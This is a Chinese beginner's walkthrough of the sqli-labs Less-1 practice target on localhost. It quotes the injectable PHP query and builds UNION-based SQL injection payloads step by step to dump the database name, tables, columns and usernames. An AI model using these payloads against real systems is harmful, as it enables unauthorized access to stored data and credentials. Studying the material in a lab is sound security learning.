靶场搭建好了，访问题目路径

http://127.0.0.1/sqli-labs-master/Less-1/

我最开始在做sql-labs靶场的时候很迷茫，不知道最后到底要得到些什么，而现在我很清楚，sql注入可以获取数据库中的信息，而获取信息就是我们的目标

 我作为一个初学者，我跟喜欢跟着源码分析思路，所以这里我贴出源码，分析一下

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);if($row){echo "<font size='5' color= '#99FF00'>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "</font>";echo "<br>";echo '执行的sql语句为：'.$sql;echo '<br/>';echo '<br/>';}else {echo '<font color= "#FFFF00">';print_r(mysql_error());echo "</font>";  }
}else { echo "Please input the ID as parameter with numeric value";}

 下面的语句是正常执行的sql语句

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

当我们更改url为下面的时候

http://127.0.0.1/sqli-labs-master/Less-1/?id=1

此刻我们也就是正常的在users中查询id=1的用户，而此刻前端也就会显示 账号和密码

由于我们审计代码发现只要是sql语句都可以执行，但是我们直接在id处书写语句是不符合sql语句的规范的，这样我们就必须想一个办法让前面的查询id可以正常执行，同时再执行其他的语句，那么这里我们就需要用到联合查询了 。

联合查询

联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表，从而实现将两个表的查询组合到一起，使用谓词为UNION或UNION ALL。

首先我们先闭合前面对id查询的语句

http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ ——+

 我们先是使用'将前面的id查询闭合起来，接着使用--+注释后端的 LIMIT 0,1

SELECT * FROM users WHERE id='1' --+' LIMIT 0,1

在联合查询注入之前要做一件很重要的事，那就是找到回显点，而回显点的个数就需要order by来查询

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 4--+

 当by后的数字为3时不报错，但是改为4的时候却产生报错

这就证明我们有三处回显位置,这时候我们就可以大胆的使用联合查询了

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,database() --+

这里我把id的值赋为0是为了联合查询的特性，前端生肖，那么就执行后端的sql语句

查询security内的所有表名

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 group_concat

将组中的字符串连接所有非NULL的字符串，如果没有非Null的字符串，那么它就会返回Null

information_schema.tables 

information_schema.tables存储了数据表的元数据信息

 table_schema 

table_schema 是数据库的名称 

查表里有什么以users表为例 

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

 查看字段里的内容（以username里面的内容为例）

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,database(), group_concat(username) from users --+